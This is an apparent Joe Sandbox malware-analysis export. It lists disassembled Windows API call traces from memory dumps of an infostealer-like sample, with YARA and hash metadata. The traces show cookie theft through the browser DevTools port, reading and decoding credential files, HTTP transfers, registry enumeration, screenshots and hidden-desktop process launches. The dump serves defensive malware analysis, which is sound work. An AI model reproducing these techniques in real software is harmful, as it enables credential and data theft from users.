                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
                                              • lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
                                              • lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              • lstrlenA.KERNEL32(?), ref: 0040D42A
                                              • lstrlenA.KERNEL32(?), ref: 0040D439
                                              • memset.MSVCRT ref: 0040D488
                                                • Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D4B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 2775534915-0
                                              • Opcode ID: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                              • Instruction ID: 090733d9ad632ec07999f14fc915118f0ed2ae89bdc12e1fab3d18f5c5045e08
                                              • Opcode Fuzzy Hash: 35fedd2b9296ef60e5301991e76848098ada1adc0417fc27961a00cc535ec500
                                              • Instruction Fuzzy Hash: 35E17571E15114ABCB04EBA1ED56EEE7339AF14305F10415EF106760A1EF38BB98CB6A
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0484D2EA
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0484D42E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0484D435
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D56F
                                              • lstrcat.KERNEL32(?,00421570), ref: 0484D57E
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D591
                                              • lstrcat.KERNEL32(?,00421574), ref: 0484D5A0
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5B3
                                              • lstrcat.KERNEL32(?,00421578), ref: 0484D5C2
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5D5
                                              • lstrcat.KERNEL32(?,0042157C), ref: 0484D5E4
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D5F7
                                              • lstrcat.KERNEL32(?,00421580), ref: 0484D606
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D619
                                              • lstrcat.KERNEL32(?,00421584), ref: 0484D628
                                              • lstrcat.KERNEL32(?,00000000), ref: 0484D63B
                                              • lstrcat.KERNEL32(?,00421588), ref: 0484D64A
                                                • Part of subcall function 0485AD97: lstrlen.KERNEL32(048451BC,?,?,048451BC,00420DDF), ref: 0485ADA2
                                                • Part of subcall function 0485AD97: lstrcpy.KERNEL32(00420DDF,00000000), ref: 0485ADFC
                                              • lstrlen.KERNEL32(?), ref: 0484D691
                                              • lstrlen.KERNEL32(?), ref: 0484D6A0
                                              • memset.MSVCRT ref: 0484D6EF
                                                • Part of subcall function 0485AFE7: StrCmpCA.SHLWAPI(00000000,00421568,0484D509,00421568,00000000), ref: 0485B006
                                              • DeleteFileA.KERNEL32(00000000), ref: 0484D71B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 1973479514-0
                                              • Opcode ID: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                              • Instruction ID: 0970a2e3a42e78cd6e937ff4bb9e54a8eef474d33016e68b38da469f5339599b
                                              • Opcode Fuzzy Hash: 61858acd6518aa59b0545b41e6e8699b4742c055ec598c9622ee146424d88619
                                              • Instruction Fuzzy Hash: 68E12071D00118ABDB08FBA4DD94EEE7339AF54305F504B59F906E60B0EE75BA48CB62
                                              APIs
                                                • Part of subcall function 00409A50: InternetOpenA.WININET(00420AF6,00000001,00000000,00000000,00000000), ref: 00409A6A
                                              • memset.MSVCRT ref: 00409C33
                                              • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 00409C48
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00409C5E
                                              • memset.MSVCRT ref: 00409C9A
                                              • lstrcatA.KERNEL32(?,cookies), ref: 00409CAF
                                              • lstrcatA.KERNEL32(?,004212C4), ref: 00409CC1
                                              • lstrcatA.KERNEL32(?,?), ref: 00409CD5
                                              • lstrcatA.KERNEL32(?,004212C8), ref: 00409CE7
                                              • lstrcatA.KERNEL32(?,?), ref: 00409CFB
                                              • lstrcatA.KERNEL32(?,.txt), ref: 00409D0D
                                              • lstrlenA.KERNEL32(00000000), ref: 00409D17
                                              • lstrlenA.KERNEL32(00000000), ref: 00409D26
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • memset.MSVCRT ref: 00409D7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$memset$lstrlen$InternetOpenlstrcpy
                                              • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                              • API String ID: 689835475-3542011879
                                              • Opcode ID: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                              • Instruction ID: dd0e0b2e904cac6dcb4644251d8498bdcd69e700431b121c7f08c254ac6fdba9
                                              • Opcode Fuzzy Hash: 8fe7c3fcfe360faa22593f97e4113398223892f47f8f887075de07db9a8ee46e
                                              • Instruction Fuzzy Hash: 97517E71D10518ABCB14EBE0EC55FEE7738AF14306F40456AF106A70D1EB78AA48CF69
                                              APIs
                                                • Part of subcall function 0485AD17: lstrcpy.KERNEL32(?,00000000), ref: 0485AD5D
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AA1
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844AB8
                                                • Part of subcall function 04844A67: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 04844ACF
                                                • Part of subcall function 04844A67: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 04844AF0
                                                • Part of subcall function 04844A67: InternetCrackUrlA.WININET(00000000,00000000), ref: 04844B00
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 04845CAF
                                              • StrCmpCA.SHLWAPI(?,006D6E80), ref: 04845CCA
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 04845E4A
                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421B50,00000000,?,006D6AF0,00000000,?,006D6CF0,00000000,?,00421B4C), ref: 04846128
                                              • lstrlen.KERNEL32(00000000), ref: 04846139
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0484614A
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 04846151
                                              • lstrlen.KERNEL32(00000000), ref: 04846166
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 0484617D
                                              • lstrlen.KERNEL32(00000000), ref: 0484618F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 048461A8
                                              • memcpy.MSVCRT(?), ref: 048461B5
                                              • lstrlen.KERNEL32(00000000,?,?), ref: 048461D2
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 048461E6
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 04846203
                                              • InternetCloseHandle.WININET(00000000), ref: 04846267
                                              • InternetCloseHandle.WININET(00000000), ref: 04846274
                                              • HttpOpenRequestA.WININET(00000000,006D6E9C,?,006D6CB4,00000000,00000000,00400100,00000000), ref: 04845EAF
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                              • InternetCloseHandle.WININET(00000000), ref: 0484627E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                              • String ID:
                                              • API String ID: 1703137719-0
                                              • Opcode ID: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                              • Instruction ID: 8c301d54101a98880f8b36054055c20d35f127d978703c8f7ac7789af5983427
                                              • Opcode Fuzzy Hash: 2a3c1412926e8dcb65fac1fead3eb2460a9c625ebd483e9c6d5746682fc61762
                                              • Instruction Fuzzy Hash: E212DD71D10128ABDB59FBA4DC94FEEB379BF54705F404B99A506A20A0EFB03A48CF51
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02CA5628,00000000,?,00421544,00000000,?,?), ref: 0040CB6C
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CB89
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CB95
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CBA8
                                              • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CBB5
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CBD9
                                              • StrStrA.SHLWAPI(?,02CA5640,00420B56), ref: 0040CBF7
                                              • StrStrA.SHLWAPI(00000000,02CA5808), ref: 0040CC1E
                                              • StrStrA.SHLWAPI(?,02CA5F30,00000000,?,00421550,00000000,?,00000000,00000000,?,02C9EFB0,00000000,?,0042154C,00000000,?), ref: 0040CDA2
                                              • StrStrA.SHLWAPI(00000000,02CA5EB0), ref: 0040CDB9
                                                • Part of subcall function 0040C920: memset.MSVCRT ref: 0040C953
                                                • Part of subcall function 0040C920: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02C9EDF0), ref: 0040C971
                                                • Part of subcall function 0040C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C97C
                                                • Part of subcall function 0040C920: memcpy.MSVCRT(?,?,?), ref: 0040CA12
                                              • StrStrA.SHLWAPI(?,02CA5EB0,00000000,?,00421554,00000000,?,00000000,02C9EDF0), ref: 0040CE5A
                                              • StrStrA.SHLWAPI(00000000,02C9EDD0), ref: 0040CE71
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B47), ref: 0040CA43
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4B), ref: 0040CA57
                                                • Part of subcall function 0040C920: lstrcatA.KERNEL32(?,00420B4E), ref: 0040CA78
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CF44
                                              • CloseHandle.KERNEL32(00000000), ref: 0040CF9C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 1564132460-3916222277
                                              • Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                              • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                              • Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                              • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 0484CDD3
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0484CDF0
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0484CDFC
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0484CE0F
                                              • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0484CE1C
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0484CE40
                                              • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 0484CE5E
                                              • StrStrA.SHLWAPI(00000000,006D6D64), ref: 0484CE85
                                              • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 0484D009
                                              • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 0484D020
                                                • Part of subcall function 0484CB87: memset.MSVCRT ref: 0484CBBA
                                                • Part of subcall function 0484CB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0484CBD8
                                                • Part of subcall function 0484CB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0484CBE3
                                                • Part of subcall function 0484CB87: memcpy.MSVCRT(?,?,?), ref: 0484CC79
                                              • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 0484D0C1
                                              • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 0484D0D8
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B47), ref: 0484CCAA
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B4B), ref: 0484CCBE
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B4E), ref: 0484CCDF
                                              • lstrlen.KERNEL32(00000000), ref: 0484D1AB
                                              • CloseHandle.KERNEL32(00000000), ref: 0484D203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 1564132460-3916222277
                                              • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                              • Instruction ID: cd7739e62c3c1d0c24c81f2193f0f914679fd361ee6387daf333cb8019ce6f9a
                                              • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                              • Instruction Fuzzy Hash: C8E1EE71D00118ABDB19EBA8DC90FEEB779AF54304F404B59F506A61A0EFB07A49CF51
                                              APIs
                                              • memset.MSVCRT ref: 0484A0AE
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                              • wsprintfA.USER32 ref: 0484A0E6
                                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0484A10A
                                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0484A133
                                              • memset.MSVCRT ref: 0484A154
                                              • lstrcat.KERNEL32(00000000,?), ref: 0484A16A
                                              • lstrcat.KERNEL32(00000000,?), ref: 0484A17E
                                              • lstrcat.KERNEL32(00000000,004212D8), ref: 0484A190
                                              • memset.MSVCRT ref: 0484A1A4
                                              • lstrcpy.KERNEL32(?,00000000), ref: 0484A1E3
                                              • memset.MSVCRT ref: 0484A203
                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0484A26B
                                              • Sleep.KERNEL32(00001388), ref: 0484A27A
                                              • CloseDesktop.USER32(00000000), ref: 0484A2C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                              • String ID: D
                                              • API String ID: 1347862506-2746444292
                                              • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                              • Instruction ID: 3db96887d18b8794723bcb59c0c8f1b5a00c93054802e8839f424f67a0d9be26
                                              • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                              • Instruction Fuzzy Hash: E551A5B1D44318ABEB24DB64CC89FD97778AF48701F004698F60DAA2D0EBB56B84CF55
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • RegOpenKeyExA.ADVAPI32(00000000,02CA2A98,00000000,00020019,00000000,004205BE), ref: 00418534
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                              • wsprintfA.USER32 ref: 004185E9
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                              • String ID: - $%s\%s$?
                                              • API String ID: 3246050789-3278919252
                                              • Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                              • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                              • Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                              • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID: `dAF$`dAF$image/jpeg
                                              • API String ID: 2244384528-2462684518
                                              • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                              • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                              • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                              • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                              • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                              • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                              • strtok.MSVCRT(00000000,?), ref: 004155EE
                                              • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                              • API String ID: 3532888709-2643084821
                                              • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                              • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                              • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                              • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                              APIs
                                              • strtok_s.MSVCRT ref: 00411557
                                              • strtok_s.MSVCRT ref: 004119A0
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
